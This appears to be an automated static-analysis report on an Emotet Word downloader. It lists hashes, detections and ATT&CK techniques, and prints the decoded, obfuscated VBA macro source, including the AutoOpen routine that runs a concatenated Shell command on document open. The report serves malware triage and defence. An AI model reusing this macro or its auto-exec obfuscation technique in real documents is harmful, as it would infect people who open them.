Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 71cc8b291e0a1ad3…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 70.5 KB
Created: 2017-09-21 05:52:00
Authoring application: Microsoft Office Word
First seen: 2017-10-10
MD5: 406923061b24da64acf5e0bb95f016e2
SHA-1: e972b212304ecb074cc9e9ded6deebc9df35ddbc
SHA-256: 71cc8b291e0a1ad38ed9142eb112f56c4a8a3eb00d130bfa27e5c40a08bc9e43
Risk score: 172

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3. Heuristics indicate the presence of VBA macros, including an AutoOpen macro and a potential Shell call, suggesting it is designed to execute code as soon as the document is opened. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6344335-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
      Public Function HcALMEXx()
      VBA.Shell$ "" + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.CustomDocumentProperties("VkUWzFneZ") + ActiveDocument.CustomDocumentProperties("NxvxRKWp") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.BuiltInDocumentProperties("Comments") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZs …
      End Function
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
      Sub autoopen()
      HcALMEXx
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7303 bytes
SHA-256: efaefb86f1eca7ddb7eebf9de4c60d6f88ae35fc6ad380a8bb63e41990dab6d4
Detection: ClamAV: No threats found
Obfuscation or payload: likely
140 of 185 identifiers look randomly generated (e.g. 'xrRbWxYCzfh') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Public Function YpPwgzEvc() As Integer
GvHxKDNB = 3957
zWyESfdK = bkCcwPP
vzSCkZd = Asc(zWyESfdK)
If GvHxKDNB > vzSCkZd Then
    For XTMRSwA = 363 To 3662
       sGBURLVuh = vzSCkZd + XTMRSwA
    Next XTMRSwA
sGBURLVuh = sGBURLVuh + GvHxKDNB
VsmNFtAgU = CStr(sGBURLVuh)
LhBSENBa = Mid(VsmNFtAgU, 2107, 8657)
hwpSFwZK = hwpSFwZK & "3843"
YpPwgzEvc = CInt(Mid(hwpSFwZK, 1130, 3720))
Else
YpPwgzEvc = 225 + 8399 + 4030 + 8993 / 9664 / 3050 / 6690 - 7314 - 3175 - 8233 + 8505 + 715
MsgBox ("NGaWVdgRpx")
 MsgBox ("LDrsekuhAFC")
 MsgBox ("sFpWTDVPkV")
 MsgBox ("SpRdfzBtz")
 MsgBox ("fmzGfwFhk")

End Function
 
Public Function shwaAXNWw() As Integer
BaTtDnYp = 4298
DsNdSBy = xrRbWxYCzfh
RPtnbaE = Asc(DsNdSBy)
If BaTtDnYp > RPtnbaE Then
    For hZyzVanMT = 2250 To 6869
       gcMFMNeZdG = RPtnbaE + hZyzVanMT
    Next hZyzVanMT
gcMFMNeZdG = gcMFMNeZdG + BaTtDnYp
WAmRrhdgD = CStr(gcMFMNeZdG)
uvmCBuH = Mid(WAmRrhdgD, 829, 4370)
aENvagug = aENvagug & "7086"
shwaAXNWw = CInt(Mid(aENvagug, 1305, 4967))
Else
shwaAXNWw = 3118 + 3719 + 1730 / 163 / 7611 - 1262 - 3054 - 4199 + 6224 + 3306
MsgBox ("EdtXCkrX")
 MsgBox ("DtpPURzVFma")
 MsgBox ("ecZpCDVmhut")
 MsgBox ("GnutKzNv")

End Function
 
Public Function pyDUNNcRv() As Integer
wmRcYCTDCr = 6292
ntcUsGKR = xEUZHGXadR
tcEEcLDpBy = Asc(ntcUsGKR)
If wmRcYCTDCr > tcEEcLDpBy Then
    For wZwxXgu = 1898 To 7071
       tUCRYahF = tcEEcLDpBy + wZwxXgu
    Next wZwxXgu
tUCRYahF = tUCRYahF + wmRcYCTDCr
htHEswBZ = CStr(tUCRYahF)
rgwceaAtRC = Mid(htHEswBZ, 2951, 5699)
HHnZPET = HHnZPET & "4190"
pyDUNNcRv = CInt(Mid(HHnZPET, 878, 4102))
Else
pyDUNNcRv = 3132 + 301 + 2700 / 8196 / 8362 / 6461 - 359 - 2308 + 5248 + 8612 + 9341
MsgBox ("DNtHLatXT")
 MsgBox ("GfRSfBD")
 MsgBox ("ffVkshSVwZ")
 MsgBox ("cgXhrDwuKwC")
 MsgBox ("entpTzThWD")
 MsgBox ("DDztNNFNGH")
 MsgBox ("CkBYMuY")

End Function
 
Public Function WRPdzLTXcvt() As Integer
yXCNDPFep = 5105
BzcrBYfS = NbUZNdHnF
VhpdWtv = Asc(BzcrBYfS)
If yXCNDPFep > VhpdWtv Then
    For xUrEWUhUMy = 1009 To 5421
       rzmAunCXt = VhpdWtv + xUrEWUhUMy
    Next xUrEWUhUMy
rzmAunCXt = rzmAunCXt + yXCNDPFep
LeNygXMKpkR = CStr(rzmAunCXt)
mXknfNMn = Mid(LeNygXMKpkR, 2976, 7798)
bdhdgrLT = bdhdgrLT & "8559"
WRPdzLTXcvt = CInt(Mid(bdhdgrLT, 1236, 5446))
Else
WRPdzLTXcvt = 7360 + 2761 + 5747 + 9689 / 6803 / 1906 - 175 - 6512 - 429 + 1919 + 8369 + 9475
MsgBox ("wkcafCCwS")
 MsgBox ("pWPzhumUX")
 MsgBox ("wtzBNCNVtaU")
 MsgBox ("empRzcuK")
 MsgBox ("EuLfkVMZuaT")
 MsgBox ("UxWyZREVz")

End Function
 
Public Function eaBHuuGzSL() As Integer
weuFyYhVLA = 6615
aYpswDnbfX = nyXsuWMMEGW
pvYnVawkKB = Asc(aYpswDnbfX)
If weuFyYhVLA > pvYnVawkKB Then
    For TnCUrTUp = 1728 To 5281
       BdSUKsXAAUz = pvYnVawkKB + TnCUrTUp
    Next TnCUrTUp
BdSUKsXAAUz = BdSUKsXAAUz + weuFyYhVLA
MHsPvZMDD = CStr(BdSUKsXAAUz)
euekFdK = Mid(MHsPvZMDD, 1128, 7623)
cdEkVkabcP = cdEkVkabcP & "3688"
eaBHuuGzSL = CInt(Mid(cdEkVkabcP, 2371, 6485))
Else
eaBHuuGzSL = 5203 + 6346 + 7165 + 1875 / 9073 / 8861 - 2526 - 8802 - 7312 + 3010 + 4348 + 9167
MsgBox ("uYSTmuXfnMa")
 MsgBox ("AcWmpbxEsyV")
 MsgBox ("GPUAxHPMRsg")

End Function

Sub autoopen()
HcALMEXx
End Sub
Public Function HcALMEXx()
VBA.Shell$ "" + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.CustomDocumentProperties("VkUWzFneZ") + ActiveDocument.CustomDocumentProperties("NxvxRKWp") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.BuiltInDocumentProperties("Comments") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + sxgxSCU, 0
End Function

Public Function sPryuWap() As Integer
rXuYUSHs = 7980
hkAghyEh = AUSpKuEZDs
yvKzWuNANM = Asc(hkAghyEh)
If rXuYUSHs > yvKzWuNANM Then
    For DedDVnmR = 3055 To 5493
       vSvruMb = yvKzWuNANM + DedDVnmR
    Next DedDVnmR
vSvruMb = vSvruMb + rXuYUSHs
zRKZNVPXu = CStr(vSvruMb)
EkNmNvef = Mid(zRKZNVPXu, 3030, 5891)
tmyDFMGy = tmyDFMGy & "2320"
sPryuWap = CInt(Mid(tmyDFMGy, 691, 9962))
Else
sPryuWap = 9368 + 3052 + 2568 + 9586 / 1628 / 2394 - 8607 - 2516 + 4377 + 2833
MsgBox ("wcsUwHpF")
 MsgBox ("EuzacEk")
 MsgBox ("aEVgbxUdutZ")
 MsgBox ("BsEKCsagFBV")
 MsgBox ("rcYeZFZY")
 MsgBox ("BAGPBdamfu")
 MsgBox ("CtGVgXP")
 MsgBox ("aBGLwWKadm")

End Function
 
Public Function BxXNANWBvA() As Integer
bWYPhkS = 3251
PPDXVzhVs = xhhXRpNft
TwBVvdfnLe = Asc(PPDXVzhVs)
If bWYPhkS > TwBVvdfnLe Then
    For ZktdEkcktBp = 3395 To 5918
       xZFsBYVCd = TwBVvdfnLe + ZktdEkcktBp
    Next ZktdEkcktBp
xZFsBYVCd = xZFsBYVCd + bWYPhkS
PCRSaPmZn = CStr(xZFsBYVCd)
yuHAzSKpv = Mid(PCRSaPmZn, 1357, 5745)
WZUYGbRr = WZUYGbRr & "640"
BxXNANWBvA = CInt(Mid(WZUYGbRr, 1918, 4636))
Else
BxXNANWBvA = 6295 + 1289 + 1307 / 974 / 4118 / 3753 - 3457 - 1582 - 5741 + 8159 + 7592 + 1983
MsgBox ("HzYrtzMyW")
 MsgBox ("ZmcxEvb")
 MsgBox ("fscRcRPExc")
 MsgBox ("xXSrHCvMmh")

End Function
 
Public Function UFsGREUwYS() As Integer
dCVwzLDYm = 1143
mbRDTtNtaX = aCtBdTkdzF
REFxgUXeN = Asc(mbRDTtNtaX)
If dCVwzLDYm > REFxgUXeN Then
    For yWGDHYBk = 211 To 5321
       aExCCefP = REFxgUXeN + yWGDHYBk
    Next yWGDHYBk
aExCCefP = aExCCefP + dCVwzLDYm
xSHxLFM = CStr(aExCCefP)
aLEPeLLDSFv = Mid(xSHxLFM, 2624, 4136)
uKuCMUXC = uKuCMUXC & "1639"
UFsGREUwYS = CInt(Mid(uKuCMUXC, 993, 4288))
Else
UFsGREUwYS = 5560 + 1895 + 2965 + 7961 / 3668 / 95 - 8874 - 364 + 9651 + 1699
MsgBox ("kAEYGgmBg")
 MsgBox ("FdptnhNSVy")
 MsgBox ("wRGNVVuZc")
 MsgBox ("TUTKHLC")

End Function
 
Public Function NecKThDbzB() As Integer
YFRTRTLHF = 7230
dkGMBgpAU = UPydfPVk
sHdufdNw = Asc(dkGMBgpAU)
If YFRTRTLHF > sHdufdNw Then
    For ahCLydfH = 80 To 9489
       PCmpRHg = sHdufdNw + ahCLydfH
    Next ahCLydfH
PCmpRHg = PCmpRHg + YFRTRTLHF
dKLKzWv = CStr(PCmpRHg)
UGnzfgD = Mid(dKLKzWv, 1402, 8244)
neDHakPkW = neDHakPkW & "9640"
NecKThDbzB = CInt(Mid(neDHakPkW, 1275, 6430))
Else
NecKThDbzB = 1930 + 233 + 9584 + 8253 / 8989 / 8689 / 2787 - 6410 - 9871 - 200 + 8054 + 2808
MsgBox ("vWWUdVLhxFU")
 MsgBox ("pepnfZdNuHm")
 MsgBox ("rsNcvHRr")
 MsgBox ("KGXBbaKveD")
 MsgBox ("KwbULpaChcK")
 MsgBox ("WkfudASDCEW")

End Function
 
Public Function eRHwYkBRbDz() As Integer
vNWaWGu = 5993
nGgFGfNrnvv = kHGuRrhs
CmMuTFVsyK = Asc(nGgFGfNrnvv)
If vNWaWGu > CmMuTFVsyK Then
    For CUrUzSfafZP = 2853 To 5923
       CgraTkgxkrH = CmMuTFVsyK + CUrUzSfafZP
    Next CUrUzSfafZP
CgraTkgxkrH = CgraTkgxkrH + vNWaWGu
pMYKKyv = CStr(CgraTkgxkrH)
KgReHrYk = Mid(pMYKKyv, 2673, 6638)
PLVENfv = PLVENfv & "768"
eRHwYkBRbDz = CInt(Mid(PLVENfv, 791, 8410))
Else
eRHwYkBRbDz = 9682 + 3950 + 8166 + 4565 / 3976 / 5734 / 6571 - 5009 - 6599 + 7676 + 7031
MsgBox ("pwuDnNU")
 MsgBox ("DUbUyeY")

End Function